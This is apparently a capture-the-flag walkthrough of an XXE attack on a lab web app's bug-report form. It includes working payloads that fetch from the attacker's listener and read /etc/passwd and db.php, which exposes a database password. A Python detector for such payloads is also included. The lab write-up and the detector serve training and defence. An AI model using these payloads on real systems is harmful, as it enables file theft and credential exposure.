2 :80 xxe

$ gobuster dir -u 10.10.11.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -x php,html,txt
===============================================================
/assets               (Status: 301) [Size: 313] [--> http://10.10.11.100/assets/]
/resources            (Status: 301) [Size: 316] [--> http://10.10.11.100/resources/]
/portal.php           (Status: 200) [Size: 125]
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.100/css/]
/index.php            (Status: 200) [Size: 25169]
/db.php               (Status: 200) [Size: 0]
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.100/js/]


http://10.10.11.100/resources/README.txt
Tasks:
[ ] Disable 'test' account on portal and switch to hashed password. Disable nopass.
[X] Write tracker submit script
[ ] Connect tracker submit script to the database
[X] Fix developer group permissions

http://10.10.11.100/portal.php
Portal under development. Go <a href="log_submit.php">here</a> to test the bounty tracker.

http://10.10.11.100/log_submit.php
Bounty Report System - Beta
# contains form to report bugs

# understanding how the data is sent: Burp shows the form submission is encoded
data entered on form > base64 > url_encode > sent.

Using CyberChef we can reproduce the recipe; using Burp we can try XXE attacks.

https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity

# adding this to our sent data
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://10.10.16.161"> %xxe; ]>

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.100 - - [01/Aug/2021 22:11:38] "GET / HTTP/1.0" 200 -

# the request comes back to our listener, so external entities are resolved: time to XXE
# Using https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#read-file

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>
<bugreport>
   <title>k</title>
   <cwe>k</cwe>
   <cvss></cvss>
   <reward>&xxe;</reward>
</bugreport>

# /etc/passwd
root:x:0:0:root:/root:/bin/bash
[truncated]
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash


# tried RCE with expect://id
# did NOT work; tried a lot

# moving back to reading files, we can now try db.php
# does not work.
# php files are not readable as plain text this way; the contents need to come back encoded in some form

Using the second case: https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity#read-file

# <!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
# <data>&example;</data>

# code
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php"> ]>
<bugreport>
   <title>k</title>
   <cwe>k</cwe>
   <cvss></cvss>
   <reward>&xxe;</reward>
</bugreport>

# encoded value
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KPCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgeHhlIFNZU1RFTSAicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT0vdmFyL3d3dy9odG1sL2RiLnBocCI%2BIF0%2BCjxidWdyZXBvcnQ%2BCiAgIDx0aXRsZT5rPC90aXRsZT4KICAgPGN3ZT5rPC9jd2U%2BCiAgIDxjdnNzPjwvY3Zzcz4KICAgPHJld2FyZD4meHhlOzwvcmV3YXJkPgo8L2J1Z3JlcG9ydD4%3D

# sent via Burp; the response shows:
Title: 	k
CWE: 	k
Score: 	
Reward: 	PD9waHAKLy8gVE9ETyAtPiBJbXBsZW1lbnQgbG9naW4gc3lzdGVtIHdpdGggdGhlIGRhdGFiYXNlLgokZGJzZXJ2ZXIgPSAibG9jYWxob3N0IjsKJGRibmFtZSA9ICJib3VudHkiOwokZGJ1c2VybmFtZSA9ICJhZG1pbiI7CiRkYnBhc3N3b3JkID0gIm0xOVJvQVUwaFA0MUExc1RzcTZLIjsKJHRlc3R1c2VyID0gInRlc3QiOwo/Pgo=

# base64 decoded
<?php
// TODO -> Implement login system with the database.
$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";
?>
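Added example, not part of the original notes: the defender-side check for this exact flow. It reverses the form's base64 > url_encode chain, flags any DOCTYPE or SYSTEM entity declaration (the two payload shapes used above) before the XML reaches a parser, and only then extracts the report fields. Both sample reports are constructed; the field names follow the bugreport XML above.

```python
import base64
import re
import urllib.parse
import xml.etree.ElementTree as ET

# Constructed samples of what log_submit.php receives, following the chain observed in
# Burp: XML -> base64 -> url_encode. The second carries the php://filter payload used
# above to pull db.php; a benign report has no DOCTYPE at all.
SAFE_REPORT = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>'
    "<bugreport><title>k</title><cwe>k</cwe><cvss></cvss><reward>100</reward></bugreport>"
)
XXE_REPORT = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/db.php"> ]>'
    "<bugreport><title>k</title><cwe>k</cwe><cvss></cvss><reward>&xxe;</reward></bugreport>"
)

def encode_like_form(xml_text: str) -> str:
    """Browser side: base64, then URL-encode (gives the %2B/%3D seen in Burp)."""
    return urllib.parse.quote(base64.b64encode(xml_text.encode("latin-1")).decode(), safe="")

def decode_submission(data: str) -> bytes:
    """Server side: reverse the chain and return the raw XML bytes."""
    return base64.b64decode(urllib.parse.unquote(data))

# XXE tells, checked on the raw text before any parser runs: a form post never needs a
# DOCTYPE; SYSTEM/PUBLIC entities (general or %-parameter) are the external references.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.I)
EXT_ENTITY_RE = re.compile(rb"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b", re.I)
SYSTEM_TARGET_RE = re.compile(rb'SYSTEM\s+"([^"]+)"', re.I)

def inspect_submission(data: str) -> dict:
    xml = decode_submission(data)
    return {
        "has_doctype": bool(DOCTYPE_RE.search(xml)),
        "external_entity": bool(EXT_ENTITY_RE.search(xml)),
        "external_targets": [t.decode("latin-1") for t in SYSTEM_TARGET_RE.findall(xml)],
    }

def parse_safely(data: str):
    """Return the report fields, or None when the submission is rejected for carrying a
    DOCTYPE. ElementTree does not fetch external entities itself; the gate is defence in depth."""
    if inspect_submission(data)["has_doctype"]:
        return None
    root = ET.fromstring(decode_submission(data))
    return {child.tag: (child.text or "") for child in root}
```

Logging `external_targets` on rejection gives the responder the resource the attacker asked for (here the db.php path) without the server ever opening it.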
